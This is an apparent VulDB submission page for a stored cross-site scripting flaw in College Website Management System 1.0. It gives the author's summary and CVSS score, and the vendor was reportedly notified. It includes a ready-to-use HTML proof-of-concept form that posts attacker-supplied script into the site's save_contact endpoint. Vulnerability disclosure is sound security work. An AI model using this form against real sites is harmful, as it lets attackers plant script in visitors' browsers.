Submit #32539: College Website Management System 1.0 - Cross-site Scripting Storedinfo

TitleCollege Website Management System 1.0 - Cross-site Scripting Stored
Description# Exploit Title: College Website Management System 1.0 - Cross-site Scripting Stored # Date: 13/03/2022 # Exploit Author: Mr Empy # Software Link: # Version: 1.0 # Tested on: Linux Title: ================ College Website Management System 1.0 - Cross-site Scripting Stored Summary: ================ The College Website Management System application is vulnerable to cross-site scripting (XSS) exploitation. Because of the lack of validation in authentication when exchanging contact information, it is possible to inject arbitrary javascript code causing a manipulation of browser features on the client side. Severity Level: ================ 7.5 (High) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N Affected Product: ================ College Website Management System v1.0 Steps to Reproduce: ================ 1. Create an HTML file and paste the following code: <html> <title>CWMS XSS PoC</title> <center> <h1>CWMS XSS PoC</h1> <form action="http://<TARGET>/cwms/classes/Master.php?f=save_contact" method="POST"> <p>School address<input type="text" name="school_address" placeholder="Inject XSS payload here"></input></p> <p>Telephone<input type="text" name="school_tel_no" placeholder="Inject XSS payload here"></input></p> <p>Email<input type="text" name="school_email" placeholder="Inject XSS payload here"></input></p> <input type="text" name="map_coords" value="10&#46;676033878642961&#44;&#32;122&#46;9520835825518" hidden></input> <button>Submit</button> </form> </center> </html> Add your target to "action" in the form and open that file using a browser. 2. Add a javascript code to one of the fields and send the request. 3. Go to and you will find your changes made. Note: the application owner has already been informed about the failure on March 13, 2022, I await a response.
Usermrempy (ID 24379)
Submission13.03.2022 18:16 (2 years ago)
Moderation13.03.2022 20:29 (2 hours later)
VulDB Entry194846

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